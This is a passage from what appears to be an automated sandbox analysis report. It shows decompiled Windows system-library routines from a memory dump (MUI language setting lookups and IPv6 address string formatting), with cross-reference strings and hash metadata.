                                                                                                                                                            				void* _t335;
                                                                                                                                                            				void* _t338;
                                                                                                                                                            				void* _t339;
                                                                                                                                                            
                                                                                                                                                            				_t328 = __edx;
                                                                                                                                                            				_t322 = __ecx;
                                                                                                                                                            				_t318 = 0;
                                                                                                                                                            				_t334 = _a4;
                                                                                                                                                            				_v8 = 0;
                                                                                                                                                            				_v28 = 0;
                                                                                                                                                            				_v48 = 0;
                                                                                                                                                            				_v20 = 0;
                                                                                                                                                            				_v40 = 0;
                                                                                                                                                            				_v32 = 0;
                                                                                                                                                            				_v52 = 0;
                                                                                                                                                            				if(_t334 == 0) {
                                                                                                                                                            					_t329 = 0xc000000d;
                                                                                                                                                            					L49:
                                                                                                                                                            					_t334[0x11] = _v56;
                                                                                                                                                            					 *_t334 =  *_t334 | 0x00000800;
                                                                                                                                                            					_t334[0x12] = _v60;
                                                                                                                                                            					_t334[0x13] = _v28;
                                                                                                                                                            					_t334[0x17] = _v20;
                                                                                                                                                            					_t334[0x16] = _v48;
                                                                                                                                                            					_t334[0x18] = _v40;
                                                                                                                                                            					_t334[0x14] = _v32;
                                                                                                                                                            					_t334[0x15] = _v52;
                                                                                                                                                            					return _t329;
                                                                                                                                                            				}
                                                                                                                                                            				_v56 = 0;
                                                                                                                                                            				if(E021F8460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
                                                                                                                                                            					_v56 = 1;
                                                                                                                                                            					if(_v8 != 0) {
                                                                                                                                                            						_t207 = E021DE025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                                                                                                                            					}
                                                                                                                                                            					_push(1);
                                                                                                                                                            					_v8 = _t318;
                                                                                                                                                            					E021F718A(_t207);
                                                                                                                                                            					_t335 = _t335 + 4;
                                                                                                                                                            				}
                                                                                                                                                            				_v60 = _v60 | 0xffffffff;
                                                                                                                                                            				if(E021F8460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
                                                                                                                                                            					_t333 =  *_v8;
                                                                                                                                                            					_v60 = _t333;
                                                                                                                                                            					_t314 = E021DE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                            					_push(_t333);
                                                                                                                                                            					_v8 = _t318;
                                                                                                                                                            					E021F718A(_t314);
                                                                                                                                                            					_t335 = _t335 + 4;
                                                                                                                                                            				}
                                                                                                                                                            				_t216 = E021F8460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
                                                                                                                                                            				_t332 = ";";
                                                                                                                                                            				if(_t216 < 0) {
                                                                                                                                                            					L17:
                                                                                                                                                            					if(E021F8460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
                                                                                                                                                            						L30:
                                                                                                                                                            						if(E021F8460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
                                                                                                                                                            							L46:
                                                                                                                                                            							_t329 = 0;
                                                                                                                                                            							L47:
                                                                                                                                                            							if(_v8 != _t318) {
                                                                                                                                                            								E021DE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                            							}
                                                                                                                                                            							if(_v28 != _t318) {
                                                                                                                                                            								if(_v20 != _t318) {
                                                                                                                                                            									E021DE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                                                                                                                            									_v20 = _t318;
                                                                                                                                                            									_v40 = _t318;
                                                                                                                                                            								}
                                                                                                                                                            							}
                                                                                                                                                            							goto L49;
                                                                                                                                                            						}
                                                                                                                                                            						_t231 = _v24;
                                                                                                                                                            						_t322 = _t231 + 4;
                                                                                                                                                            						_push(_t231);
                                                                                                                                                            						_v52 = _t322;
                                                                                                                                                            						E021F718A(_t231);
                                                                                                                                                            						if(_t322 == _t318) {
                                                                                                                                                            							_v32 = _t318;
                                                                                                                                                            						} else {
                                                                                                                                                            							_v32 = E021DE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                                                                                                            						}
                                                                                                                                                            						if(_v32 == _t318) {
                                                                                                                                                            							_v52 = _t318;
                                                                                                                                                            							L58:
                                                                                                                                                            							_t329 = 0xc0000017;
                                                                                                                                                            							goto L47;
                                                                                                                                                            						} else {
                                                                                                                                                            							E021D2340(_v32, _v8, _v24);
                                                                                                                                                            							_v16 = _v32;
                                                                                                                                                            							_a4 = _t318;
                                                                                                                                                            							_t235 = E021EE679(_v32, _t332);
                                                                                                                                                            							while(1) {
                                                                                                                                                            								_t319 = _t235;
                                                                                                                                                            								if(_t319 == 0) {
                                                                                                                                                            									break;
                                                                                                                                                            								}
                                                                                                                                                            								 *_t319 = 0;
                                                                                                                                                            								_t321 = _t319 + 2;
                                                                                                                                                            								E021DE2A8(_t322,  &_v68, _v16);
                                                                                                                                                            								if(E021F5553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                            									_a4 = _a4 + 1;
                                                                                                                                                            								}
                                                                                                                                                            								_v16 = _t321;
                                                                                                                                                            								_t235 = E021EE679(_t321, _t332);
                                                                                                                                                            								_pop(_t322);
                                                                                                                                                            							}
                                                                                                                                                            							_t236 = _v16;
                                                                                                                                                            							if( *_v16 != _t319) {
                                                                                                                                                            								E021DE2A8(_t322,  &_v68, _t236);
                                                                                                                                                            								if(E021F5553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                            									_a4 = _a4 + 1;
                                                                                                                                                            								}
                                                                                                                                                            							}
                                                                                                                                                            							if(_a4 == 0) {
                                                                                                                                                            								E021DE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
                                                                                                                                                            								_v52 = _v52 & 0x00000000;
                                                                                                                                                            								_v32 = _v32 & 0x00000000;
                                                                                                                                                            							}
                                                                                                                                                            							if(_v8 != 0) {
                                                                                                                                                            								E021DE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                                                                                                                            							}
                                                                                                                                                            							_v8 = _v8 & 0x00000000;
                                                                                                                                                            							_t318 = 0;
                                                                                                                                                            							goto L46;
                                                                                                                                                            						}
                                                                                                                                                            					}
                                                                                                                                                            					_t257 = _v24;
                                                                                                                                                            					_t322 = _t257 + 4;
                                                                                                                                                            					_push(_t257);
                                                                                                                                                            					_v40 = _t322;
                                                                                                                                                            					E021F718A(_t257);
                                                                                                                                                            					_t338 = _t335 + 4;
                                                                                                                                                            					if(_t322 == _t318) {
                                                                                                                                                            						_v20 = _t318;
                                                                                                                                                            					} else {
                                                                                                                                                            						_v20 = E021DE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                                                                                                            					}
                                                                                                                                                            					if(_v20 == _t318) {
                                                                                                                                                            						_v40 = _t318;
                                                                                                                                                            						goto L58;
                                                                                                                                                            					} else {
                                                                                                                                                            						E021D2340(_v20, _v8, _v24);
                                                                                                                                                            						_v16 = _v20;
                                                                                                                                                            						_a4 = _t318;
                                                                                                                                                            						_t261 = E021EE679(_v20, _t332);
                                                                                                                                                            						_t335 = _t338 + 0x14;
                                                                                                                                                            						while(1) {
                                                                                                                                                            							_v12 = _t261;
                                                                                                                                                            							if(_t261 == _t318) {
                                                                                                                                                            								break;
                                                                                                                                                            							}
                                                                                                                                                            							_v12 = _v12 + 2;
                                                                                                                                                            							 *_v12 = 0;
                                                                                                                                                            							E021DE2A8(_v12,  &_v68, _v16);
                                                                                                                                                            							if(E021F5553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                            								_a4 = _a4 + 1;
                                                                                                                                                            							}
                                                                                                                                                            							_v16 = _v12;
                                                                                                                                                            							_t261 = E021EE679(_v12, _t332);
                                                                                                                                                            							_pop(_t322);
                                                                                                                                                            						}
                                                                                                                                                            						_t269 = _v16;
                                                                                                                                                            						if( *_v16 != _t318) {
                                                                                                                                                            							E021DE2A8(_t322,  &_v68, _t269);
                                                                                                                                                            							if(E021F5553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                            								_a4 = _a4 + 1;
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            						if(_a4 == _t318) {
                                                                                                                                                            							E021DE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                                                                                                                            							_v40 = _t318;
                                                                                                                                                            							_v20 = _t318;
                                                                                                                                                            						}
                                                                                                                                                            						if(_v8 != _t318) {
                                                                                                                                                            							E021DE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                            						}
                                                                                                                                                            						_v8 = _t318;
                                                                                                                                                            						goto L30;
                                                                                                                                                            					}
                                                                                                                                                            				}
                                                                                                                                                            				_t284 = _v24;
                                                                                                                                                            				_t322 = _t284 + 4;
                                                                                                                                                            				_push(_t284);
                                                                                                                                                            				_v48 = _t322;
                                                                                                                                                            				E021F718A(_t284);
                                                                                                                                                            				_t339 = _t335 + 4;
                                                                                                                                                            				if(_t322 == _t318) {
                                                                                                                                                            					_v28 = _t318;
                                                                                                                                                            				} else {
                                                                                                                                                            					_v28 = E021DE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                                                                                                            				}
                                                                                                                                                            				if(_v28 == _t318) {
                                                                                                                                                            					_v48 = _t318;
                                                                                                                                                            					goto L58;
                                                                                                                                                            				} else {
                                                                                                                                                            					E021D2340(_v28, _v8, _v24);
                                                                                                                                                            					_v16 = _v28;
                                                                                                                                                            					_a4 = _t318;
                                                                                                                                                            					_t288 = E021EE679(_v28, _t332);
                                                                                                                                                            					_t335 = _t339 + 0x14;
                                                                                                                                                            					while(1) {
                                                                                                                                                            						_v12 = _t288;
                                                                                                                                                            						if(_t288 == _t318) {
                                                                                                                                                            							break;
                                                                                                                                                            						}
                                                                                                                                                            						_v12 = _v12 + 2;
                                                                                                                                                            						 *_v12 = 0;
                                                                                                                                                            						E021DE2A8(_v12,  &_v68, _v16);
                                                                                                                                                            						if(E021F5553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                            							_a4 = _a4 + 1;
                                                                                                                                                            						}
                                                                                                                                                            						_v16 = _v12;
                                                                                                                                                            						_t288 = E021EE679(_v12, _t332);
                                                                                                                                                            						_pop(_t322);
                                                                                                                                                            					}
                                                                                                                                                            					_t296 = _v16;
                                                                                                                                                            					if( *_v16 != _t318) {
                                                                                                                                                            						E021DE2A8(_t322,  &_v68, _t296);
                                                                                                                                                            						if(E021F5553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                            							_a4 = _a4 + 1;
                                                                                                                                                            						}
                                                                                                                                                            					}
                                                                                                                                                            					if(_a4 == _t318) {
                                                                                                                                                            						E021DE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
                                                                                                                                                            						_v48 = _t318;
                                                                                                                                                            						_v28 = _t318;
                                                                                                                                                            					}
                                                                                                                                                            					if(_v8 != _t318) {
                                                                                                                                                            						E021DE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                            					}
                                                                                                                                                            					_v8 = _t318;
                                                                                                                                                            					goto L17;
                                                                                                                                                            				}
                                                                                                                                                            			}





































                                                                                                                                                            0x02241afd
                                                                                                                                                            0x02241afe
                                                                                                                                                            0x02241b01
                                                                                                                                                            0x02241b06
                                                                                                                                                            0x02241b06
                                                                                                                                                            0x021f87d6
                                                                                                                                                            0x021f87f2
                                                                                                                                                            0x021f87f7
                                                                                                                                                            0x021f8807
                                                                                                                                                            0x021f880a
                                                                                                                                                            0x021f880f
                                                                                                                                                            0x021f8810
                                                                                                                                                            0x021f8813
                                                                                                                                                            0x021f8818
                                                                                                                                                            0x021f8818
                                                                                                                                                            0x021f882c
                                                                                                                                                            0x021f8831
                                                                                                                                                            0x021f8838
                                                                                                                                                            0x021f8908
                                                                                                                                                            0x021f8920
                                                                                                                                                            0x021f89f0
                                                                                                                                                            0x021f8a08
                                                                                                                                                            0x021f8af6
                                                                                                                                                            0x021f8af6
                                                                                                                                                            0x021f8af8
                                                                                                                                                            0x021f8afb
                                                                                                                                                            0x02241beb
                                                                                                                                                            0x02241beb
                                                                                                                                                            0x021f8b04
                                                                                                                                                            0x02241bf8
                                                                                                                                                            0x02241c0e
                                                                                                                                                            0x02241c13
                                                                                                                                                            0x02241c16
                                                                                                                                                            0x02241c16
                                                                                                                                                            0x02241bf8
                                                                                                                                                            0x00000000
                                                                                                                                                            0x021f8b04
                                                                                                                                                            0x021f8a0e
                                                                                                                                                            0x021f8a11
                                                                                                                                                            0x021f8a14
                                                                                                                                                            0x021f8a15
                                                                                                                                                            0x021f8a18
                                                                                                                                                            0x021f8a22
                                                                                                                                                            0x021f8b59
                                                                                                                                                            0x021f8a28
                                                                                                                                                            0x021f8a3c
                                                                                                                                                            0x021f8a3c
                                                                                                                                                            0x021f8a42
                                                                                                                                                            0x02241bb0
                                                                                                                                                            0x02241b11
                                                                                                                                                            0x02241b11
                                                                                                                                                            0x00000000
                                                                                                                                                            0x021f8a48
                                                                                                                                                            0x021f8a51
                                                                                                                                                            0x021f8a5b
                                                                                                                                                            0x021f8a5e
                                                                                                                                                            0x021f8a61
                                                                                                                                                            0x021f8a69
                                                                                                                                                            0x021f8a69
                                                                                                                                                            0x021f8a6d
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x021f8a74
                                                                                                                                                            0x021f8a7c
                                                                                                                                                            0x021f8a7d
                                                                                                                                                            0x021f8a91
                                                                                                                                                            0x021f8a93
                                                                                                                                                            0x021f8a93
                                                                                                                                                            0x021f8a98
                                                                                                                                                            0x021f8a9b
                                                                                                                                                            0x021f8aa1
                                                                                                                                                            0x021f8aa1
                                                                                                                                                            0x021f8aa4
                                                                                                                                                            0x021f8aaa
                                                                                                                                                            0x021f8ab1
                                                                                                                                                            0x021f8ac5
                                                                                                                                                            0x021f8ac7
                                                                                                                                                            0x021f8ac7
                                                                                                                                                            0x021f8ac5
                                                                                                                                                            0x021f8ace
                                                                                                                                                            0x02241bc9
                                                                                                                                                            0x02241bce
                                                                                                                                                            0x02241bd2
                                                                                                                                                            0x02241bd2
                                                                                                                                                            0x021f8ad8
                                                                                                                                                            0x021f8aeb
                                                                                                                                                            0x021f8aeb
                                                                                                                                                            0x021f8af0
                                                                                                                                                            0x021f8af4
                                                                                                                                                            0x00000000
                                                                                                                                                            0x021f8af4
                                                                                                                                                            0x021f8a42
                                                                                                                                                            0x021f8926
                                                                                                                                                            0x021f8929
                                                                                                                                                            0x021f892c
                                                                                                                                                            0x021f892d
                                                                                                                                                            0x021f8930
                                                                                                                                                            0x021f8935
                                                                                                                                                            0x021f893a
                                                                                                                                                            0x021f8b51
                                                                                                                                                            0x021f8940
                                                                                                                                                            0x021f8954
                                                                                                                                                            0x021f8954
                                                                                                                                                            0x021f895a
                                                                                                                                                            0x02241b63
                                                                                                                                                            0x00000000
                                                                                                                                                            0x021f8960
                                                                                                                                                            0x021f8969
                                                                                                                                                            0x021f8973
                                                                                                                                                            0x021f8976
                                                                                                                                                            0x021f8979
                                                                                                                                                            0x021f897e
                                                                                                                                                            0x021f8981
                                                                                                                                                            0x021f8981
                                                                                                                                                            0x021f8986
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x02241b6e
                                                                                                                                                            0x02241b74
                                                                                                                                                            0x02241b7b
                                                                                                                                                            0x02241b8f
                                                                                                                                                            0x02241b91
                                                                                                                                                            0x02241b91
                                                                                                                                                            0x02241b99
                                                                                                                                                            0x02241b9c
                                                                                                                                                            0x02241ba2
                                                                                                                                                            0x02241ba2
                                                                                                                                                            0x021f898c
                                                                                                                                                            0x021f8992
                                                                                                                                                            0x021f8999
                                                                                                                                                            0x021f89ad
                                                                                                                                                            0x02241ba8
                                                                                                                                                            0x02241ba8
                                                                                                                                                            0x021f89ad
                                                                                                                                                            0x021f89b6
                                                                                                                                                            0x021f89c8
                                                                                                                                                            0x021f89cd
                                                                                                                                                            0x021f89d0
                                                                                                                                                            0x021f89d0
                                                                                                                                                            0x021f89d6
                                                                                                                                                            0x021f89e8
                                                                                                                                                            0x021f89e8
                                                                                                                                                            0x021f89ed
                                                                                                                                                            0x00000000
                                                                                                                                                            0x021f89ed
                                                                                                                                                            0x021f895a
                                                                                                                                                            0x021f883e
                                                                                                                                                            0x021f8841
                                                                                                                                                            0x021f8844
                                                                                                                                                            0x021f8845
                                                                                                                                                            0x021f8848
                                                                                                                                                            0x021f884d
                                                                                                                                                            0x021f8852
                                                                                                                                                            0x021f8b49
                                                                                                                                                            0x021f8858
                                                                                                                                                            0x021f886c
                                                                                                                                                            0x021f886c
                                                                                                                                                            0x021f8872
                                                                                                                                                            0x02241b0e
                                                                                                                                                            0x00000000
                                                                                                                                                            0x021f8878
                                                                                                                                                            0x021f8881
                                                                                                                                                            0x021f888b
                                                                                                                                                            0x021f888e
                                                                                                                                                            0x021f8891
                                                                                                                                                            0x021f8896
                                                                                                                                                            0x021f8899
                                                                                                                                                            0x021f8899

                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            • Kernel-MUI-Number-Allowed, xrefs: 021F87E6
                                                                                                                                                            • WindowsExcludedProcs, xrefs: 021F87C1
                                                                                                                                                            • Kernel-MUI-Language-SKU, xrefs: 021F89FC
                                                                                                                                                            • Kernel-MUI-Language-Disallowed, xrefs: 021F8914
                                                                                                                                                            • Kernel-MUI-Language-Allowed, xrefs: 021F8827
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2380389755.00000000021C0000.00000040.00000001.sdmp, Offset: 021B0000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.2380381681.00000000021B0000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2380554938.00000000022A0000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2380560407.00000000022B0000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2380566043.00000000022B4000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2380572289.00000000022B7000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2380578244.00000000022C0000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2380623418.0000000002320000.00000040.00000001.sdmp
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _wcspbrk
                                                                                                                                                            • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                                                            • API String ID: 402402107-258546922
                                                                                                                                                            • Opcode ID: cdbe3e1a71513267a46ef50da6a182cce23f7740848348c85aaa47af1a58c679
                                                                                                                                                            • Instruction ID: 8ef4d1424b2cd48c7183e1f4128bf71ef06e513fe7e14a148e61e13b7aa40674
                                                                                                                                                            • Opcode Fuzzy Hash: cdbe3e1a71513267a46ef50da6a182cce23f7740848348c85aaa47af1a58c679
                                                                                                                                                            • Instruction Fuzzy Hash: 9BF1E5B2D40209EFCF55DFA8C980AEEBBB9FF08304F15446AE615A7210E7349A55DF60
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 38%
                                                                                                                                                            			E022113CB(intOrPtr* _a4, intOrPtr _a8) {
                                                                                                                                                            				char _v8;
                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                            				intOrPtr* _v16;
                                                                                                                                                            				intOrPtr _v20;
                                                                                                                                                            				char _v24;
                                                                                                                                                            				intOrPtr _t71;
                                                                                                                                                            				signed int _t78;
                                                                                                                                                            				signed int _t86;
                                                                                                                                                            				char _t90;
                                                                                                                                                            				signed int _t91;
                                                                                                                                                            				signed int _t96;
                                                                                                                                                            				intOrPtr _t108;
                                                                                                                                                            				signed int _t114;
                                                                                                                                                            				void* _t115;
                                                                                                                                                            				intOrPtr _t128;
                                                                                                                                                            				intOrPtr* _t129;
                                                                                                                                                            				void* _t130;
                                                                                                                                                            
                                                                                                                                                            				_t129 = _a4;
                                                                                                                                                            				_t128 = _a8;
                                                                                                                                                            				_t116 = 0;
                                                                                                                                                            				_t71 = _t128 + 0x5c;
                                                                                                                                                            				_v8 = 8;
                                                                                                                                                            				_v20 = _t71;
                                                                                                                                                            				if( *_t129 == 0) {
                                                                                                                                                            					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
                                                                                                                                                            						goto L5;
                                                                                                                                                            					} else {
                                                                                                                                                            						_t96 =  *(_t129 + 8) & 0x0000ffff;
                                                                                                                                                            						if(_t96 != 0) {
                                                                                                                                                            							L38:
                                                                                                                                                            							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
                                                                                                                                                            								goto L5;
                                                                                                                                                            							} else {
                                                                                                                                                            								_push( *(_t129 + 0xf) & 0x000000ff);
                                                                                                                                                            								_push( *(_t129 + 0xe) & 0x000000ff);
                                                                                                                                                            								_push( *(_t129 + 0xd) & 0x000000ff);
                                                                                                                                                            								_t86 = E02207707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
                                                                                                                                                            								L36:
                                                                                                                                                            								return _t128 + _t86 * 2;
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
                                                                                                                                                            						if(_t114 == 0) {
                                                                                                                                                            							L33:
                                                                                                                                                            							_t115 = 0x21d2926;
                                                                                                                                                            							L35:
                                                                                                                                                            							_push( *(_t129 + 0xf) & 0x000000ff);
                                                                                                                                                            							_push( *(_t129 + 0xe) & 0x000000ff);
                                                                                                                                                            							_push( *(_t129 + 0xd) & 0x000000ff);
                                                                                                                                                            							_push( *(_t129 + 0xc) & 0x000000ff);
                                                                                                                                                            							_t86 = E02207707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
                                                                                                                                                            							goto L36;
                                                                                                                                                            						}
                                                                                                                                                            						if(_t114 != 0xffff) {
                                                                                                                                                            							_t116 = 0;
                                                                                                                                                            							goto L38;
                                                                                                                                                            						}
                                                                                                                                                            						if(_t114 != 0) {
                                                                                                                                                            							_t115 = 0x21d9cac;
                                                                                                                                                            							goto L35;
                                                                                                                                                            						}
                                                                                                                                                            						goto L33;
                                                                                                                                                            					}
                                                                                                                                                            				} else {
                                                                                                                                                            					L5:
                                                                                                                                                            					_a8 = _t116;
                                                                                                                                                            					_a4 = _t116;
                                                                                                                                                            					_v12 = _t116;
                                                                                                                                                            					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
                                                                                                                                                            						if( *(_t129 + 0xa) == 0xfe5e) {
                                                                                                                                                            							_v8 = 6;
                                                                                                                                                            						}
                                                                                                                                                            					}
                                                                                                                                                            					_t90 = _v8;
                                                                                                                                                            					if(_t90 <= _t116) {
                                                                                                                                                            						L11:
                                                                                                                                                            						if(_a8 - _a4 <= 1) {
                                                                                                                                                            							_a8 = _t116;
                                                                                                                                                            							_a4 = _t116;
                                                                                                                                                            						}
                                                                                                                                                            						_t91 = 0;
                                                                                                                                                            						if(_v8 <= _t116) {
                                                                                                                                                            							L22:
                                                                                                                                                            							if(_v8 < 8) {
                                                                                                                                                            								_push( *(_t129 + 0xf) & 0x000000ff);
                                                                                                                                                            								_push( *(_t129 + 0xe) & 0x000000ff);
                                                                                                                                                            								_push( *(_t129 + 0xd) & 0x000000ff);
                                                                                                                                                            								_t128 = _t128 + E02207707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
                                                                                                                                                            							}
                                                                                                                                                            							return _t128;
                                                                                                                                                            						} else {
                                                                                                                                                            							L14:
                                                                                                                                                            							L14:
                                                                                                                                                            							if(_a4 > _t91 || _t91 >= _a8) {
                                                                                                                                                            								if(_t91 != _t116 && _t91 != _a8) {
                                                                                                                                                            									_push(":");
                                                                                                                                                            									_push(_t71 - _t128 >> 1);
                                                                                                                                                            									_push(_t128);
                                                                                                                                                            									_t128 = _t128 + E02207707() * 2;
                                                                                                                                                            									_t71 = _v20;
                                                                                                                                                            									_t130 = _t130 + 0xc;
                                                                                                                                                            								}
                                                                                                                                                            								_t78 = E02207707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
                                                                                                                                                            								_t130 = _t130 + 0x10;
                                                                                                                                                            							} else {
                                                                                                                                                            								_push(L"::");
                                                                                                                                                            								_push(_t71 - _t128 >> 1);
                                                                                                                                                            								_push(_t128);
                                                                                                                                                            								_t78 = E02207707();
                                                                                                                                                            								_t130 = _t130 + 0xc;
                                                                                                                                                            								_t91 = _a8 - 1;
                                                                                                                                                            							}
                                                                                                                                                            							_t91 = _t91 + 1;
                                                                                                                                                            							_t128 = _t128 + _t78 * 2;
                                                                                                                                                            							_t71 = _v20;
                                                                                                                                                            							if(_t91 >= _v8) {
                                                                                                                                                            								goto L22;
                                                                                                                                                            							}
                                                                                                                                                            							_t116 = 0;
                                                                                                                                                            							goto L14;
                                                                                                                                                            						}
                                                                                                                                                            					} else {
                                                                                                                                                            						_t108 = 1;
                                                                                                                                                            						_v16 = _t129;
                                                                                                                                                            						_v24 = _t90;
                                                                                                                                                            						do {
                                                                                                                                                            							if( *_v16 == _t116) {
                                                                                                                                                            								if(_t108 - _v12 > _a8 - _a4) {
                                                                                                                                                            									_a4 = _v12;
                                                                                                                                                            									_a8 = _t108;
                                                                                                                                                            								}
                                                                                                                                                            								_t116 = 0;
                                                                                                                                                            							} else {
                                                                                                                                                            								_v12 = _t108;
                                                                                                                                                            							}
                                                                                                                                                            							_v16 = _v16 + 2;
                                                                                                                                                            							_t108 = _t108 + 1;
                                                                                                                                                            							_t26 =  &_v24;
                                                                                                                                                            							 *_t26 = _v24 - 1;
                                                                                                                                                            						} while ( *_t26 != 0);
                                                                                                                                                            						goto L11;
                                                                                                                                                            					}
                                                                                                                                                            				}
                                                                                                                                                            			}





















                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2380389755.00000000021C0000.00000040.00000001.sdmp, Offset: 021B0000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.2380381681.00000000021B0000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2380554938.00000000022A0000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2380560407.00000000022B0000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2380566043.00000000022B4000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2380572289.00000000022B7000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2380578244.00000000022C0000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2380623418.0000000002320000.00000040.00000001.sdmp
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ___swprintf_l
                                                                                                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                            • API String ID: 48624451-2108815105
                                                                                                                                                            • Opcode ID: 10e8a11e4be85da3109c26d108a719e2ba2cbeb1195e66e8f1ad8359232d4985
                                                                                                                                                            • Instruction ID: e390def1b5adaf107fabc6f2c428dc3daaabf3d78315786219976ce520875fe6
                                                                                                                                                            • Opcode Fuzzy Hash: 10e8a11e4be85da3109c26d108a719e2ba2cbeb1195e66e8f1ad8359232d4985
                                                                                                                                                            • Instruction Fuzzy Hash: 286103B1920656EADF38CFD9C8809BEBBF6EF94300714C12DE69A47548D374A650CBA0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 64%
                                                                                                                                                            			E02207EFD(void* __ecx, intOrPtr _a4) {
                                                                                                                                                            				signed int _v8;
                                                                                                                                                            				char _v540;
                                                                                                                                                            				unsigned int _v544;
                                                                                                                                                            				signed int _v548;
                                                                                                                                                            				intOrPtr _v552;
                                                                                                                                                            				char _v556;
                                                                                                                                                            				void* __ebx;
                                                                                                                                                            				void* __edi;
                                                                                                                                                            				void* __esi;
                                                                                                                                                            				signed int _t33;
                                                                                                                                                            				void* _t38;
                                                                                                                                                            				unsigned int _t46;
                                                                                                                                                            				unsigned int _t47;
                                                                                                                                                            				unsigned int _t52;
                                                                                                                                                            				intOrPtr _t56;
                                                                                                                                                            				unsigned int _t62;
                                                                                                                                                            				void* _t69;
                                                                                                                                                            				void* _t70;
                                                                                                                                                            				intOrPtr _t72;
                                                                                                                                                            				signed int _t73;
                                                                                                                                                            				void* _t74;
                                                                                                                                                            				void* _t75;
                                                                                                                                                            				void* _t76;
                                                                                                                                                            				void* _t77;
                                                                                                                                                            
                                                                                                                                                            				_t33 =  *0x22b2088; // 0x7769ef74
                                                                                                                                                            				_v8 = _t33 ^ _t73;
                                                                                                                                                            				_v548 = _v548 & 0x00000000;
